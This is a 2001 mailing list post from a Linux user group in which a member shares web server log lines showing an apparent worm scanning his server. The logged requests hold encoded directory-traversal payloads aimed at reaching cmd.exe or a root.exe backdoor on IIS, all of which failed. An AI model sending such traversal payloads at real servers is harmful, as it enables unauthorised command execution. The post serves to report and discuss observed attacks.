[lug] New worm war going on?
Samartha Deva
blug-receive at mtbwr.net
Tue Sep 18 11:56:49 MDT 2001
Seems there is some worm war going on, pretty crazy, I get a lot of this:
>63.101.179.133 - - [18/Sep/2001:11:51:34 -0600] "GET
>/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 332
>63.101.179.133 - - [18/Sep/2001:11:51:36 -0600] "GET
>/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 348
>63.101.179.133 - - [18/Sep/2001:11:51:37 -0600] "GET
>/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
>63.101.179.133 - - [18/Sep/2001:11:51:38 -0600] "GET
>/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
>63.101.179.133 - - [18/Sep/2001:11:51:39 -0600] "GET
>/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
>63.101.179.133 - - [18/Sep/2001:11:51:40 -0600] "GET
>/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
>63.101.179.133 - - [18/Sep/2001:11:51:45 -0600] "GET
>/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 298
>63.227.216.126 - - [18/Sep/2001:11:51:51 -0600] "GET
>/scripts/root.exe?/c+dir HTTP/1.0" 404 293
>63.101.179.133 - - [18/Sep/2001:11:51:55 -0600] "GET
>/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 298
>63.101.179.133 - - [18/Sep/2001:11:51:56 -0600] "GET
>/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
>63.101.179.133 - - [18/Sep/2001:11:51:58 -0600] "GET
>/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
>63.227.216.126 - - [18/Sep/2001:11:52:00 -0600] "GET
>/MSADC/root.exe?/c+dir HTTP/1.0" 404 291
>63.227.216.126 - - [18/Sep/2001:11:52:10 -0600] "GET
>/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
>63.227.216.126 - - [18/Sep/2001:11:52:19 -0600] "GET
>/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
Samartha
More information about the LUG
mailing list